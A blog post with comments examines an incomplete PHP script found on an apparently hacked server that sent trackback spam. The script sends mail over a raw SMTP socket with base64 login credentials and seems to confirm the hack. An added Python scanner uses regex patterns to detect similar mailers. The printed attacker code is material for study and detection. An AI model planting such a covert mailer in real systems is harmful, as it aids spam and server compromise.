Damn Spam!

Hacked server spamming

   

Looking through the Bad Behavior logs, I've noticed a bunch of rejected trackback spam attempts from 64.71.177.84, belonging to Hurricane Electric (Not the first time I've seen that name, btw. They seem to be popular with the spammers, for whatever reason ...).

Well, I decided to type that IP address into my browser and got this piece of PHP code:

; $from_mail = "phpauth@yandex.ru";
$to_mail = "grigory@mail.astrakhan.ru";
$message = "Subject: testnFrom: $from_mailnTo: $to_mailntest";
$host = "smtp.yandex.ru";
$port = 25;
$errno = 30;
$errstr = 1;
$timeout = 1;
$handle = fsockopen($host, $port, $errno, $errstr, $timeout);
fputs($handle, "EHLO $hostrn");
echo fread($handle, 4096) . "

";
fputs($handle, "AUTH LOGINrn");
echo fread($handle, 4096) . "

";
fputs($handle, base64_encode($user) . "rn");
echo fread($handle, 4096) . "

";
fputs($handle, base64_encode($pass) . "rn");
echo fread($handle, 4096) . "

";
fputs($handle, "MAIL FROM:<$from_mail>rn");
echo fread($handle, 4096) . "

";
fputs($handle, "RCPT TO:<$to_mail>rn");
echo fread($handle, 4096) . "

";
fputs($handle, "DATArn");
echo fread($handle, 4096) . "

";
fputs($handle, "$messagern.rn");
echo fread($handle, 4096) . "

";
fputs($handle, "QUITrn");
echo fread($handle, 4096) . "

";
fclose($handle);
?>

Hacked server spamming
This is interesting. Makes me wonder if my trackback is even working on my site over at www.spacequad.com for users to make a post that would allow me to even have a link in one of my messages. I know I did a manual trackback from this site a while back, but as of 8 months ago, nada a thing.

I highly doubt that this script even works, well not in its present form at least.

Michael

---
Ironmax

Authored by: ironmax on Saturday, September 15 2007 @ 11:43 CEST
Hacked server spamming

Well, that (incomplete) piece of code attempts to send an email (Geeklog ate the backslashes - "rn" stands for a carriage return + linefeed). Looks like some sort of confirmation email that the hack has succeeded. The trackbacks are probably sent from some other script on the same server.

Authored by: Dirk on Saturday, September 15 2007 @ 12:04 CEST
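
Anyone who finds a fragment like the one above may want to check whether other PHP files in a web root carry the same hand-written SMTP AUTH LOGIN dialogue over a raw socket. The following is an added example, not part of the original post or its comments; the indicator names, the threshold and both sample snippets are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Heuristic indicators taken from the fragment in the post: a raw socket
# plus a hand-written SMTP AUTH LOGIN dialogue inside a PHP file.
INDICATORS = {
    "raw_socket": re.compile(r"\b(?:p?fsockopen|stream_socket_client)\s*\(", re.I),
    "smtp_greeting": re.compile(r"""["'](?:EHLO|HELO)\b""", re.I),
    "auth_login": re.compile(r"""["']AUTH\s+LOGIN""", re.I),
    "b64_credentials": re.compile(r"base64_encode\s*\(\s*\$\w+", re.I),
    "envelope": re.compile(r"""["'](?:MAIL\s+FROM|RCPT\s+TO):""", re.I),
}
# Assumed threshold: a raw socket and at least two SMTP-dialogue indicators.
MIN_SMTP_HITS = 2

def indicators_in(source: str) -> list[str]:
    """Return the names of all indicators present in PHP source text."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]

def is_suspicious(source: str) -> bool:
    """True when a raw socket is combined with enough SMTP-dialogue hits."""
    hits = indicators_in(source)
    return "raw_socket" in hits and len(hits) - 1 >= MIN_SMTP_HITS

def scan_webroot(root: str) -> dict[str, list[str]]:
    """Map each suspicious *.php file under root to its matched indicators."""
    findings = {}
    for path in Path(root).rglob("*.php"):
        source = path.read_text(errors="replace")
        if is_suspicious(source):
            findings[str(path)] = indicators_in(source)
    return findings

# Constructed samples (placeholder hosts and addresses, not from the post).
SAMPLE_MAILER = '''<?php
$h = fsockopen("smtp.example.com", 25, $errno, $errstr, 5);
fputs($h, "EHLO smtp.example.com\\r\\n");
fputs($h, "AUTH LOGIN\\r\\n");
fputs($h, base64_encode($user) . "\\r\\n");
fputs($h, "MAIL FROM:<a@example.com>\\r\\n");
'''
SAMPLE_BENIGN = '''<?php
$h = fsockopen("www.example.com", 80, $errno, $errstr, 5);
fputs($h, "GET / HTTP/1.0\\r\\n\\r\\n");
'''

if __name__ == "__main__":
    print(indicators_in(SAMPLE_MAILER), is_suspicious(SAMPLE_BENIGN))
```

The patterns do not depend on the line terminators, so a copy with the backslashes stripped still matches. Legitimate mail libraries that speak SMTP over sockets will match too, so treat a hit as a file to review, not a verdict.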
